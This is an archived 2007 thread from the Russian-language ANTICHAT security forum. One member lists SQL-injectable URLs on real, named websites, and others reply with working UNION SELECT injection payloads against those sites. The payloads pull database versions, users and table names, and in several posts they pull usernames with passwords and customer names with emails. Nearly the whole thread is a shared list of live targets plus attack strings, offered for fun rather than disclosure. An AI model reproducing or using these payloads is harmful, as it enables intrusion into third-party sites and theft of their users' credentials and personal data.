ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
05.04.2007, 20:46
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091
Репутация:
1686
|
|
http://www.jemjabella.co.uk/postbyid.php?id='
http://www2.bham.ac.uk/core/core_picker/download.asp?documenttable='
http://www.thecomedystore.co.uk/page.php?id='
http://www.franinfo.co.uk/exhibitors.php?id='
http://www.franinfo.co.uk/exhi_detail.php?id='
http://www.jemjabella.co.uk/postbyid.php?id='
http://www.teltonika.lt/ru/pages/view/?id='
http://www.bendruomenes.lt/news.php?id='
http://www.biuropasaulis.lt/pk/produkcija/models.php?id='
http://www.bendruomenes.lt/news.php?id='
http://www.avilys.lt/index.php?id='
http://paulauskas.president.lt/one.phtml?id='
http://www.skautai.lt/users.php?id='
http://www.skautai.lt/index.php?id='
http://kaunas.lcn.lt/arkikatedra/index.php?id='
http://www.auksinisvarnas.lt/index.php?id='
http://www.eurodesk.lt/index.php?language='
http://www.esecurity.lt/article.php?id='
http://leidykla.ktu.lt/main.php?ID='
вот щас очень занят а хотел поковырять --давайте сами =)
|
|
|
05.04.2007, 21:21
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Вывод в title'е:
Код:
http://www.islamcom.ru/material.php?id=10000000+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.islamcom.ru/material.php?id=10000000+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+20,1/*
http://www.islamcom.ru/material.php?id=10000000+union+select+table_column,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=char(105,99,95,115,117,98,115,99,114,105,98,101,114,115)+limit+0,1/*
http://www.islamcom.ru/material.php?id=10000000+union+select+concat(id,char(58),email),2,3,4,5,6,7,8,9,10,11,12,13,14+from+ic_subscribers+limit+6,1/*
|
|
|
|
05.04.2007, 21:26
|
|
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
Провел на форуме:
1237085
Репутация:
452
|
|
Код:
http://www.ezgulik.org/news.php?id=-197+union+select+1,2,version(),concat(user(),0x3a,database()),5,6/*&status=1
|
|
|
|
06.04.2007, 18:08
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Сообщение от genom--
...
http://www.bendruomenes.lt/news.php?id='
...
вот щас очень занят а хотел поковырять --давайте сами =)
Наугад выбрал:
Код:
http://www.bendruomenes.lt/news.php?id=-1+UNION+select+1,2,3,4,5,concat(version(),char(58),user()),7,8,9,10/*
А вот здесь на сайте c приветствием "Welcome to my website. My name is Jem and I'm a l33t PHP ninja." версия выводится в строку адреса:
Код:
http://www.jemjabella.co.uk/postbyid.php?id=-1+UNION+SELECT+concat(version(),char(58),user())/*
Я долго ржал.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
Последний раз редактировалось ShadOS; 06.04.2007 в 18:16..
|
|
|
|
06.04.2007, 18:46
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
2ShadOS
ну тогда уж сразу вывел бы данные или это уже не в моде? 
Код:
http://www.bendruomenes.lt/news.php?strid=-23412+union+select+concat(username,char(58),password)+from+users/*
|
|
|
|
06.04.2007, 20:30
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Сообщение от genom--
...
http://leidykla.ktu.lt/main.php?ID='
...
а вот здесь blind. У меня опыта маловато чтобы что-то сделать дальше:
Код:
http://leidykla.ktu.lt/main.php?ID=-1)+UNION+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|
|
05.04.2007, 21:24
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
2 genom--
Щас ковырнем малость 
http://www.thecomedystore.co.uk/page.php?id=-2%20union%20select%201,concat(name,char(58),email) %20from%20orders/*
http://www.bendruomenes.lt/news.php?id=1%20union%20select%201,concat(username ,char(58),password),2,4,5,6,7,8,9,0%20from%20users/*
|
|
|
|
05.04.2007, 21:32
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036
Репутация:
726
|
|
http://www.karavan-megastore.com.ua
Версия MySql:
Код:
http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,VERSION(),null,null
Логин текущего пользователя базы данных:
Код:
http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,USER(),null,null
Имя используемой базы данных:
Код:
http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,DATABASE(),null,null
Вот так всё простинька))
Последний раз редактировалось _GaLs_; 05.04.2007 в 21:35..
|
|
|
|
05.04.2007, 21:32
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641
Репутация:
590
|
|
Код:
http://www.payolibre.com/noticias/noticias2.php?id=-413+union+select+1,2,3,4,user(),6/*
Код:
http://www.jerashfestival.com.jo/inner.php?id=-9+union+select+version()/*
Код:
http://www.iblaw.com.jo/practice.php?id=-8+union+select+1,database(),3,4/*
|
|
|
|
05.04.2007, 21:45
|
|
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972
Репутация:
250
|
|
Код:
http://www.uris.com.ua/index.php?page=8&id=-8+union+select+1,2,concat(database(),0x3a,version()),4,5,6/*
вывод в title:
Код:
http://www.designplace.org/tutorials.php?page=1&c_id=-27+union+select+version(),2,3/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид